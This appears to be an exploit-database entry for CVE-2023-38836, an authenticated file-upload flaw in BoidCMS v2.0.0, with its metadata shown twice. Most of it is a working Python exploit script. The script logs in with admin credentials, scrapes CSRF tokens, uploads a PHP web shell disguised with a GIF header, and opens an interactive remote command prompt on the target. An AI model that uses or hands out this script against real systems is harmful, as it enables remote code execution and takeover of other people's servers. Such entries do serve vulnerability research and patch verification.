BoidCMS v2.0.0 - authenticated file upload vulnerability
Author: 1337kid
type: webapps
platform: php
port:
date_added: 2023-10-09
date_updated: 2023-10-09
verified: 0
codes: CVE-2023-38836
tags:
aliases:
screenshot_url:
application_url:
raw file: 51741.py
type: webapps
platform: php
port:
date_added: 2023-10-09
date_updated: 2023-10-09
verified: 0
codes: CVE-2023-38836
tags:
aliases:
screenshot_url:
application_url:
raw file: 51741.py
#!/usr/bin/python3 # Exploit Title: BoidCMS v2.0.0 - authenticated file upload vulnerability # Date: 08/21/2023 # Exploit Author: 1337kid # Vendor Homepage: https://boidcms.github.io/#/ # Software Link: https://boidcms.github.io/BoidCMS.zip # Version: <= 2.0.0 # Tested on: Ubuntu # CVE : CVE-2023-38836 import requests import re import argparse parser = argparse.ArgumentParser(description='Exploit for CVE-2023-38836') parser.add_argument("-u", "--url", help="website url") parser.add_argument("-l", "--user", help="admin username") parser.add_argument("-p", "--passwd", help="admin password") args = parser.parse_args() base_url=args.url user=args.user passwd=args.passwd def showhelp(): print(parser.print_help()) exit() if base_url == None: showhelp() elif user == None: showhelp() elif passwd == None: showhelp() with requests.Session() as s: req=s.get(f'{base_url}/admin') token=re.findall('[a-z0-9]{64}',req.text) form_login_data={ "username":user, "password":passwd, "login":"Login", } form_login_data['token']=token s.post(f'{base_url}/admin',data=form_login_data) #=========== File upload to RCE req=s.get(f'{base_url}/admin?page=media') token=re.findall('[a-z0-9]{64}',req.text) form_upld_data={ "token":token, "upload":"Upload" } #==== php shell php_code=['GIF89a;\n','<?php system($_GET["cmd"]) ?>'] with open('shell.php','w') as f: f.writelines(php_code) #==== file = {'file' : open('shell.php','rb')} s.post(f'{base_url}/admin?page=media',files=file,data=form_upld_data) req=s.get(f'{base_url}/media/shell.php') if req.status_code == '404': print("Upload failed") exit() print(f'Shell uploaded to "{base_url}/media/shell.php"') while 1: cmd=input("cmd >> ") if cmd=='exit': exit() req=s.get(f'{base_url}/media/shell.php',params = {"cmd": cmd}) print(req.text)
Copyright © 2024 Irfan TOOR all rights reserved.